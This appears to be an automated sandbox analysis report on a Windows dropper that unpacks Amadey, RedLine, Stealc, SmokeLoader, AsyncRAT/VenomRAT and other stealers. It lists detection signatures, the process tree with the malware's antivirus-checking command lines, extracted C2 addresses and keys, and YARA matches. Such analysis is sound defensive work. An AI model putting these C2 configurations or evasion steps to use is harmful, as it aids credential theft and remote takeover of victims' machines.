Edit tour

Windows Analysis Report
PQ2AUndsdb.exe

Overview

General Information

Sample name:	PQ2AUndsdb.exe renamed because original name is a hash value
Original sample name:	f7b78fc6239775c67933713a1e65570e9be12c8b72a3225600112e4e40a81958.exe
Analysis ID:	1499383
MD5:	3d299133a21509bb0b005f7e18239517
SHA1:	9e9e464145f6208a62bc01a42568dbc259afbd50
SHA256:	f7b78fc6239775c67933713a1e65570e9be12c8b72a3225600112e4e40a81958
Tags:	exe
Infos:

Detection

Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys stealer DLL

Yara detected AsyncRAT

Yara detected Cryptbot

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Stealc

Yara detected VenomRAT

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PQ2AUndsdb.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\PQ2AUndsdb.exe" MD5: 3D299133A21509BB0B005F7E18239517)

axplong.exe (PID: 2516 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 3D299133A21509BB0B005F7E18239517)

axplong.exe (PID: 7944 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 3D299133A21509BB0B005F7E18239517)

GOLD.exe (PID: 8164 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000002001\GOLD.exe" MD5: D6FCA3CD57293390CCF9D2BC83662DDA)

RegAsm.exe (PID: 2020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

crypteda.exe (PID: 7352 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000004001\crypteda.exe" MD5: 8E74497AFF3B9D2DDB7E7F819DFC69BA)

RegAsm.exe (PID: 5604 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

wxfM3haI2K.exe (PID: 1456 cmdline: "C:\Users\user\AppData\Roaming\wxfM3haI2K.exe" MD5: 88367533C12315805C059E688E7CDFE9)

conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XBckuYbXje.exe (PID: 396 cmdline: "C:\Users\user\AppData\Roaming\XBckuYbXje.exe" MD5: 30F46F4476CDC27691C7FDAD1C255037)

setup2.exe (PID: 2056 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000005001\setup2.exe" MD5: D78D85135F584E455F692923D9FEB804)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

stealc_default2.exe (PID: 1848 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)

Set-up.exe (PID: 5108 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000129001\Set-up.exe" MD5: EE1442544088C8A6AC94E0A849CBCCE2)

runtime.exe (PID: 7720 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000150001\runtime.exe" MD5: 7ADFC6A2E7A5DAA59D291B6E434A59F3)

cmd.exe (PID: 3424 cmdline: "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 988 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4196 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7048 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5248 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7556 cmdline: cmd /c md 40365 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7036 cmdline: findstr /V "HopeBuildersGeniusIslam" Sonic MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3792 cmdline: cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

XClient_protected.exe (PID: 6224 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000190001\XClient_protected.exe" MD5: C27417453090D3CF9A3884B503D22C49)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://yosoborno.com/tmp/", "http://wshcnsd.xyz/tmp/", "http://nusdhj.ws/tmp/"]}

Threatname: VenomRAT

{"Server": "62.113.117.95", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "nsBwpZM9eXyJwjFOEPqQT7eVgQEXAQHF", "Mutex": "hwelcvbupaqfzors", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "gHC5vkN9zBopm5sBbLuVVSEzvzYOUKFV8bvwuRt+l6zqoaDt4+6q8X89hkYZwRRcV4aSBKWG1W0vjQwl0JkuLKf9aLLnXR/AYXJhp2MJwHgpiyEAz1Nd29z7lL/5+DGBmeGzzFtFDN2FiRyRIFZxaXr/QOXK3uCwMuCxCpIIoqQ=", "BDOS": "null"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Threatname: AsyncRAT

{"Server": "62.113.117.95", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "nsBwpZM9eXyJwjFOEPqQT7eVgQEXAQHF", "Mutex": "hwelcvbupaqfzors", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "gHC5vkN9zBopm5sBbLuVVSEzvzYOUKFV8bvwuRt+l6zqoaDt4+6q8X89hkYZwRRcV4aSBKWG1W0vjQwl0JkuLKf9aLLnXR/AYXJhp2MJwHgpiyEAz1Nd29z7lL/5+DGBmeGzzFtFDN2FiRyRIFZxaXr/QOXK3uCwMuCxCpIIoqQ=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Threatname: Cryptbot

{"C2 list": ["vs.top", "@fivexx5vs.top", "xx5vs.top", "`vfivexx5vs.top", "fivexx5vs.top", "s.top", "analforeverlovyu.top"]}

Threatname: RedLine

{"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf88a:$q1: Select * from Win32_CacheMemory 0xf8ca:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf918:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf966:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf88a:$q1: Select * from Win32_CacheMemory 0xf8ca:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf918:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf966:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Roaming\XBckuYbXje.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000002.2041286886.0000000000880000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.1885204503.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001E.00000002.2041214532.00000000007B1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x11f37:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000003.1283323218.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1298815760.0000000000C31000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000003.1848639136.0000000004A90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000003.1257937192.00000000049B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000002.1323636516.00000000005C1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000000.1924581251.0000000000E82000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GOLD.exe PID: 8164	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2020	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2020	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5604	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: wxfM3haI2K.exe PID: 1456	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: XBckuYbXje.exe PID: 396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: XBckuYbXje.exe PID: 396	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 1848	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 1848	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 1848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 1848	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Set-up.exe PID: 5108	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: XClient_protected.exe PID: 6224	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.0.wxfM3haI2K.exe.e80000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.wxfM3haI2K.exe.e80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.wxfM3haI2K.exe.e80000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
38.0.XClient_protected.exe.df0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
38.0.XClient_protected.exe.df0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf88a:$q1: Select * from Win32_CacheMemory 0xf8ca:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf918:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf966:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
28.0.XBckuYbXje.exe.740000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.RegAsm.exe.436060.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.RegAsm.exe.482060.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
